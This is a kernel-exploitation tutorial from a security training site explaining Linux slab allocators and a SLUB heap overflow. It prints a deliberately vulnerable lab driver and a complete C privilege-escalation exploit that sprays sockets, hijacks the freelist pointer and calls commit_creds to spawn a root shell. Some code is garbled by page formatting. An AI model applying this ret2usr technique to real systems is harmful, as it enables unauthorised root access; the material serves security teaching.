Hacking

Exploiting Linux Kernel Heap Corruptions (SLUB Allocator)

M G
November 19, 2013 by
M G

1. Introduction

In recent years, several researchers have studied Linux kernel security. The most common kernel privilege vulnerabilities can be divided into several categories: NULL pointer dereference, kernel space stack overflow, kernel slab overflow, race conditions, etc.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Some of them are pretty easy to exploit and there is no need to prepare your own Linux kernel debugging environment to write the exploit. Some others requires special knowledge of Linux kernel design, routines, memory management, etc.

In this tutorial we will explain how the SLUB allocator works and how we can make our user-land code to be executed when we can corrupt some metadata from a slab allocator.

2. The Slab Allocator

The Linux kernel has three main different memory allocators: SLAB, SLUB, and SLOB.

I would note that "slab" means the general allocator design, while SLAB/SLUB/SLOB are slab implementations in the Linux kernel.

And you can use only one of them; by default, Linux kernel uses the SLUB allocator, since 2.6 is a default memory manager when a Linux kernel developer calls kmalloc().

So let's talk a little bit about these three implementations and describe how they work.

2.1. SLAB allocator

The SLAB is a set of one or more contiguous pages of memory handled by the slab allocator for an individual cache. Each cache is responsible for a specific kernel structure allocation. So the SLAB is set of object allocations of the same type.

The SLAB is described with the following structure:

[python]

struct slab

{

union

{

struct

{

struct list_head list;

unsigned long colouroff;

void *s_mem;

unsigned int inuse; /* num of used objects */

kmem_bufctl_t free;

unsigned short nodeid;

};

struct slab_rcu __slab_cover_slab_rcu;

};

};

[/python]

For example, if you make two allocations of tasks_struct using kmalloc, these two objects are allocated in the same SLAB cache, because they have the same type and size.

Two pages with six objects in the same type handled by a slab cache

2.2. SLUB allocator

SLUB is currently the default slab allocator in the Linux kernel. It was implemented to solve some drawbacks of the SLAB design.

The following figure includes the most important members of the page structure. (Look here to see the full version.)

[python]

struct page

{

...

struct

{

union

{

pgoff_t index; /* Our offset within mapping. */

void *freelist; /* slub first free object */

};

...

struct

{

unsigned inuse:16;

unsigned objects:15;

unsigned frozen:1;

};

...
};

...

union

{

...

struct kmem_cache *slab; /* SLUB: Pointer to slab */

...

};

...

};

[/python]

A page's freelist pointer is used to point to the first free object in the slab. This first free object has another small header, which has another freelist pointer that points to the next free object in the slab, while inuse is used to track of the number of objects that have been allocated.

The figure illustrates that:

The SLUB ALLOCATOR: linked list between free objects.

The SLUB allocator manages many of dynamic allocations/deallocations of the internal kernel memory. The kernel distinguishes these allocations/deallocations by their sizes;

some caches are called general-purpose (kmalloc-192: it holds allocations between 128 and 192 bytes). For example, if you invoke kmalloc to allocate 50 bytes, it creates the chunk of memory from the general-purpose kmalloc-64, because 50 is between 32 and 64.

For more details, you can type "cat /proc/slabinfo."

/proc/slabinfo has no longer readable by a simple user …, so you should work with the super-user when writing exploits.

2.3. SLOB allocator

The SLOB allocator was designed for small systems with limited amounts of memory, such as embedded Linux systems.

SLOB places all allocated objects on pages arranged in three linked lists.

3. kernel SLUB overflow

Exploiting SLUB overflows requires some knowledge about the SLUB allocator (we've described it above) and is one of the most advanced exploitation techniques.

Keep in mind that objects in a slab are allocated contiguously so, if we can overwrite the metadata used by the SLUB allocator, we can switch the execution flow into the user space and execute our evil code. So our goal is to control the freelist pointer,

The freelist pointer, as described above, is a pointer to the next free object in the slab cache. If freelist is NULL, the slab is full, no more free objects are available, and the kernel asks for another slab cache with PAGE_SIZE of bytes (PAGE_SIZE=4096). If we overwrite this pointer with an address of our choice, we can return to a given kernel path an arbitrary memory address (user-land code).

So let's make a small demonstration and look at this in more practical way. I've built a vulnerable device driver that does some trivial input/output interactions with userland processes.

The code:

[c]
#include <Linux/init.h> #include <Linux/module.h> #include <Linux/uaccess.h> #include <Linux/cdev.h> #include <Linux/fs.h> #include <Linux/slab.h>

#define DEVNAME "vuln"
#define MAX_RW (PAGE_SIZE*2)

MODULE_AUTHOR("Mohamed Ghannam");
MODULE_LICENSE("GPL v2");

static struct cdev *cdev;

static char *ramdisk;

static int vuln_major = 700,vuln_minor = 3;

static dev_t first;

static int count = 1;

static int vuln_open_dev(struct inode *inode ,, struct file *file) {

static int counter=0;

char *ramdisk;

printk(KERN_INFO"opening device : %s n",DEVNAME);

ramdisk = kzalloc(MAX_RW,GFP_KERNEL);

if(!ramdisk)

return -ENOMEM;

//file->private_data = ramdisk;

printk(KERN_INFO"MAJOR no = %d and MINOR no = %dn",imajor(inode),iminor(inode));

printk(KERN_INFO"Opened device : %sn",DEVNAME);

counter++;

printk(KERN_INFO"opened : %dn",counter);

return 0;

}

static int vuln_release_dev(struct inode *inode,struct file *file)

{

printk(KERN_INFO"closing device : %s n",DEVNAME);

return 0;

}

static ssize_t vuln_write_dev(struct file *file ,,const char __user *buf,size_t lbuf,loff_t *ppos)

{

int nbytes,i;

char *copy;

char *ramdisk = kzalloc(lbuf,GFP_KERNEL);

if(!ramdisk)

return -ENOMEM;

copy = kmalloc(256 ,, GFP_KERNEL);

if(!copy)

return -ENOMEM;

if ((lbuf+*ppos) > MAX_RW) {

printk(KERN_WARNING"Write Abbort n");

return 0;

}

nbytes = lbuf - copy_from_user(ramdisk+ *ppos ,, buf,lbuf);
ppos += nbytes;

for(i=0;i<0x40;i++) copy[i]=0xCC; memcpy(copy,ramdisk,lbuf); printk("ramdisk : %s n",ramdisk); printk("Writing : bytes = %dn",(int)lbuf); return nbytes; } static ssize_t vuln_read_dev(struct file *file ,,char __user *buf,size_t lbuf ,,loff_t *ppos) { int nbytes; char *ramdisk = file->private_data;

if((lbuf + *ppos) > MAX_RW) {

printk(KERN_WARNING"Read Abort n");

return 0;

}

nbytes = lbuf - copy_to_user(buf,ramdisk + *ppos ,, lbuf);

*ppos += nbytes;

return nbytes;

}

static struct file_operations fps = {

.owner = THIS_MODULE,

.open = vuln_open_dev,

.release = vuln_release_dev,

.write = vuln_write_dev,

.read = vuln_read_dev,

};

static int __init vuln_init(void)

{

ramdisk = kmalloc(MAX_RW,GFP_KERNEL);

first = MKDEV(vuln_major,vuln_minor);

register_chrdev_region(first,count,DEVNAME);

cdev = cdev_alloc();

cdev_init(cdev,&fps);

cdev_add(cdev,first,count);

printk(KERN_INFO"Registring device %sn",DEVNAME);

return 0;

}

static void __exit vuln_exit(void)

{

cdev_del(cdev);

unregister_chrdev_region(first,count);

kfree(ramdisk);

}

module_init(vuln_init);

module_exit(vuln_exit)

[/c]

Let's describe a little bit what the code does: This is a dummy kernel model that creates a character device, "/dev/vuln," and makes some basic I/O operations.

The bug is obvious to spot.

In the vuln_write_dev() function, we notice that the ramdisk variable is used to store the user input and it's allocated safely with lbuf, which is the length of user input. Then it will be copied into the copy variable, which is kmalloc'ed with 256 bytes. So it is easy to spot that there is a heap SLUB overflow if a user writes data greater in size than 256 bytes.

First you should download the lab of this article. It is a qemu archive system containing the kernel module, the proof of concept, and the final exploit.

Let's trigger the bug first:

So we've successfully overwritten the freelist pointer for the next free object.

If we overwrite this freelist metadata with the address of a userland function, we can run our userland function inside the kernel space; thus we can hijack root privileges and drop the shell after.

I forgot to mention that there are three categories of the slab caches: full slab, partial slab, and empty slab.

Full slab: The slab cache is fully allocated and doesn't contain any free chunks so its freelist equals NULL.

Partial slab: The slab cache contains free and allocated chunks and is able to allocate other chunks.

Empty slab: The slab cache doesn't have any allocation, so all chunks are free and ready to be allocated.

4. Building the exploit

So the problem is that, when the attacker wants to overwrite a freelist pointer, he must take care of the slab's situation and it should be either a full slab or an empty slab. He also needs to make sure that the next freelist pointer is the right target.

So we have 256 bytes allocated with kmalloc, so we should take a look at /proc/slabinfo and gather some useful information about the general-purpose kmalloc-256. The next step is to make a comparison between the free objects and used objects in the slab cache and then we have to fill them and make the slab full to ensure that the kernel will create a fresh slab.

To do that we have to figure out some ways to make allocations in the general purpose "kmalloc-256,", and we find that a good target for this is struct file kernel structure. Since we can't allocate it directly from the user space, we can do it by calling some syscalls to do it for us, such as open(), socket(), etc.

Calling these kinds of functions allows us to make some struct file allocations and that's good for an attacker's purpose.

As we described earlier, we should ensure that there are no more free chunks for the current slab, so we have to make a lot of struct file allocations:

[python]

for(i=0;i<1000;i++)

socket(AF_INET,SOCK_STREAM,0);

[/python]

Good, so take a look again at the slab cache. The next thing to do is to trigger the crash. If we write an amount of data greater than 256 bytes, we will definitely overwrite the next free list pointer to let the kernel execute some userspace codes of our choice.

So how does the userland code get to be executed in the kernel land ?

We have to look for function pointers and we are glad to see that struct file contains struct file_operations containing a function pointer.

Our attack is shown below:

[python]

struct file {

.f_op = struct file_operations = {

.fsync = ATTACKER_ADDRESS,

};

};

[/python]

As you see, you there are a lot of function pointers and you can choose any one you want. But how can we put this "ATTACKER_ADDRESS" ? The idea is to build a new fake struct file and put its address in the payload, so the freelist will be overwritten by the address of our fake struct file; thus the freelist points into our fake struct file and it assumes that it's the next free object, so we are moving the control flow into the userspace. This is a powerful technique.

When the attacker calls fsync(2) syscall, the ATTACKER_ADDRESS will be executed instead of the real fsync operation. Good, so we can execute our userland code, but how can we get root privileges ? It's very easy to get root by calling:

[python]

commit_creds(prepare_kernel_cred(0));

[/python]

The final exploit is like this:

[c]

#include <arpa/inet.h>

#include

#include

#include <netinet/in.h>

#include

#include

#include

#include

#include <sys/socket.h>

#include <sys/utsname.h>

#include <sys/stat.h>

#include <sys/types.h>

#include

#include

#define BUF_LEN 256

struct list_head {

struct list_head *prev,*next;

};

struct path {

void *mnt;

void *dentry;

};

struct file_operations {

void *owner;

void *llseek;

void *read;

void *write;

void *aio_read;

void *aio_write;

void *readdir;

void *poll;

void *unlocked_ioctl;

void *compat_ioctl;

void *mmap;

void *open;

void *flush;

void *release;

void *fsync;

void *aio_fsync;

void *fasync;

void *lock;

void *sendpage;

void *get_unmapped_area;

void *check_flags;

void *flock;

void *splice_write;

void *splice_read;

void *setlease;

void *fallocate;

void *show_fdinfo;

} op;

struct file {

struct list_head fu_list;

struct path f_path;

struct file_operations *f_op;

long int buf[1024];

} file;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int win=0;

static unsigned long get_kernel_sym(char *name) {

FILE *f;

unsigned long addr;

char dummy;

char sname[512];

struct utsname ver;

int ret;

int rep = 0;

int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

goto fallback;

oldstyle = 1;

}

repeat:

ret = 0;

while(ret != EOF) {

if (!oldstyle)

ret = fscanf(f, "%p %c %sn", (void **)&addr, &dummy, sname);

else {

ret = fscanf(f, "%p %sn", (void **)&addr, sname);

if (ret == 2) {

char *p;

if (strstr(sname, "_O/") || strstr(sname, "_S."))

continue;

p = strrchr(sname, '_');

if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char *)sname && *(p - 1) == '_')

p--;

*p = '';

}

}

}

if (ret == 0) {

fscanf(f, "%sn", sname);

continue;

}

if (!strcmp(name, sname)) {

printf("[+] Resolved %s to %p%sn", name, (void *)addr, rep ? " (via System.map)" : "");

fclose(f);

return addr;

}

}

fclose(f);

if (rep)

return 0;

fallback:

uname(&ver);

if (strncmp(ver.release, "2.6", 3))

oldstyle = 1;

sprintf(sname, "/boot/System.map-%s", ver.release);

f = fopen(sname, "r");

if (f == NULL)

return 0;

rep = 1;

goto repeat;

}

int getroot(void) {

win=1;

commit_creds(prepare_kernel_cred(0));

return -1;

}

int main(int argc,char ** argv)

{

char *payload;

int payload_len;

void *ptr = &file;

payload_len = 256+9;

payload = malloc(payload_len);

if(!payload){

perror("malloc");

return -1;

}

memset(payload,'A',payload_len);

memcpy(payload+256,&ptr,sizeof(ptr));

payload[payload_len]=0;

int fd = open("/dev/vuln",O_RDWR);

if(fd == -1) {

perror("open ");

return -1;

}

commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

int i;

for(i=0;i<1000;i++){

if(socket(AF_INET,SOCK_STREAM,0) == -1){

perror("socket fill ");

return -1;

}

}

write(fd,payload,payload_len);

int target_fd ;

target_fd = socket(AF_INET,SOCK_STREAM,0);

target_fd = socket(AF_INET,SOCK_STREAM,0);

file.f_op = &op;

op.fsync = &getroot;

fsync(target_fd);

pid_t pid = fork();

if (pid == 0) {

setsid();

while (1) {

sleep(9999);

}

}

printf("[+] rooting shell ....");

close(target_fd);

if(win){

printf("OKn[+] Droping root shell ... n");

execl("/bin/sh","/bin/sh",NULL);

}else

printf("FAIL n");

return 0;

}

[/c]

Let's run the code:

Bingo!

5. Conclusion

We have studied how the kernel SLUB works and how we can get privileges. Exploiting kernel vulnerabilities is not so different than userspace, but the kernel exploit development requires strong knowledge of how the kernel works, its routines, how it protects against race conditions, etc.

It was very fun to play with these kind of bugs, as there are not a whole lot of modern, public example s of SLUB overflow exploits.

Here some references that might help you:

Linux Kernel CAN SLUB Overflow

A Guide to Kernel Exploitation: Attacking the Core

PlaidCTF2013 servr CTF challenge

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Exploit Linux Kernel Slub Overflow